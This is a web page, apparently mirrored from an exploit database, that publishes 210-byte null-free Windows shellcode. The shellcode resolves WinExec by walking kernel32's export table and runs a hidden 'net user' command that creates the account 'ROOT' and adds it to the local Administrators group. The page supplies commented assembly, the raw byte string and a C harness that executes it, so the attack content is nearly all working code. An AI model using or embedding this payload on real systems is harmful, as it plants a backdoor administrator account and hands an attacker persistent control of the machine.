Registerwindowsx64 winexec addadmin (rooti@mr00t$) dynamic nullfree shellcode (210 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & windows_x86-64 vulnerability
Online Vulnerability Scanner Tools
Code...
## Exploit Title: Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) ## Exploit Author: Bobby Cooke ## Date: 2020-03-21 ## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86) ## Description: Windows Shellcode that adds the user 'ROOT' with the password 'I@mR00T$' to the system. The user 'ROOT' is then added to the localgroup 'Administrators'. get_kernel32_address: xor eax, eax mov eax, [fs:eax+0x30] ; EAX = &PEB mov eax, [eax+0xC] ; EAX = &LDR mov esi, [eax+0x1C] ; ESI = 1st entry InitOrderList - ntdll.dll lodsd ; EAX = 2nd entry InitOrderList - kernelbase.dll xchg esi, eax lodsd ; EAX = 3rd entry InitOrderList - kernel32.dll mov eax, [eax+0x8] ; EAX = &Kernel32.dll push eax get_kernel32_export_table: mov ebx, [eax+0x3C] ; EBX = RVA NewEXEHeader add ebx, eax ; EBX = &NewEXEHeader mov ebx, [ebx+0x78] ; EBX = RVA ExportTable add ebx, eax ; EBX = &ExportTable get_export_name_table: mov edx, [ebx+0x20] ; EDX = RVA ExportNameTable add edx, eax ; EDX = &ExportNameTable get_export_ordinal_table: mov ecx, [ebx+0x24] ; ECX = RVA ExportOrdinalTable add ecx, eax ; ECX = &ExportOrdinalTable push ecx get_export_addr_table: mov edi, [ebx+0x1C] ; EDI = RVA ExportAddrTable add edi, eax ; EDI = &ExportAddrTable push edi WinExec_String: push 0x456E6957 ; EniW counter_init: xor eax, eax ; EAX = Counter searchLoop: mov edi, edx ; EDI = &ExportNameTable mov esi, esp ; ESI = "WinE" xor ecx, ecx cld ; Process strings left to right mov edi, [edi+eax*4] ; EDI = RVA NthNameString add edi, [esp+0xC] ; EDI = &NthNameString add cx, 0x4 ; ECX = len("WinE") repe cmpsb ; compare [&NthNameString] to "WinExec" jz found ; If [&NthNameString] == "WinExec" end loop inc eax ; Counter ++ jmp short searchLoop ; restart loop found: mov ecx, [esp+0x8] ; ECX = &ExportOrdinalTable mov ax, [ecx + eax*2] ; AX = ordinalNumber mov edx, [esp+0x4] ; EDX = &ExportAddrTable mov ebx, [edx + eax*4] ; EBX = RVA WinExec add ebx, [esp+0xC] ; EBX = &WinExec add_user: ; Call WinExec( CmdLine, ShowState ); ; $CmdLine = 'cmd.exe /c net user ROOT I@mR00T$ /ADD && net localgroup Administrators ROOT /ADD' ; $ShowState = SW_HIDE xor ecx, ecx mul ecx mov al, 0x44 ; D : 44 push eax push 0x44412f20 ; DA/ push 0x544f4f52 ; TOOR push 0x2073726f ; sro push 0x74617274 ; tart push 0x73696e69 ; sini push 0x6d644120 ; mdA push 0x70756f72 ; puor push 0x676c6163 ; glac push 0x6f6c2074 ; ol t push 0x656e2026 ; en & push 0x26204444 ; & DD push 0x412f2024 ; A/ $ push 0x54303052 ; T00R push 0x6d404920 ; m@I push 0x544f4f52 ; TOOR push 0x20726573 ; res push 0x75207465 ; u te push 0x6e20632f ; n c/ push 0x20657865 ; exe push 0x2e646d63 ; .dmc mov eax, esp ; EAX = &CmdLine push ecx ; $ShowState push eax ; $CmdLine call ebx ; Call the WinExec Function ############################################### #include <windows.h> #include <stdio.h> char code[] = \ "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c" "\xad\x96\xad\x8b\x40\x08\x50\x8b\x58\x3c\x01\xc3" "\x8b\x5b\x78\x01\xc3\x8b\x53\x20\x01\xc2\x8b\x4b" "\x24\x01\xc1\x51\x8b\x7b\x1c\x01\xc7\x57\x68\x57" "\x69\x6e\x45\x31\xc0\x89\xd7\x89\xe6\x31\xc9\xfc" "\x8b\x3c\x87\x03\x7c\x24\x0c\x66\x83\xc1\x04\xf3" "\xa6\x74\x03\x40\xeb\xe7\x8b\x4c\x24\x08\x66\x8b" "\x04\x41\x8b\x54\x24\x04\x8b\x1c\x82\x03\x5c\x24" "\x0c\x31\xc9\xf7\xe1\xb0\x44\x50\x68\x20\x2f\x41" "\x44\x68\x52\x4f\x4f\x54\x68\x6f\x72\x73\x20\x68" "\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41" "\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67" "\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" "\x44\x20\x26\x68\x24\x20\x2f\x41\x68\x52\x30\x30" "\x54\x68\x20\x49\x40\x6d\x68\x52\x4f\x4f\x54\x68" "\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63" "\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e" "\x89\xe0\x51\x50\xff\xd3"; int main(int argc, char **argv) { int (*func)(); func = (int(*)()) code; (int)(*func)(); }
Windowsx64 winexec addadmin (rooti@mr00t$) dynamic nullfree shellcode (210 bytes) Vulnerability / Exploit Source : Windowsx64 winexec addadmin (rooti@mr00t$) dynamic nullfree shellcode (210 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes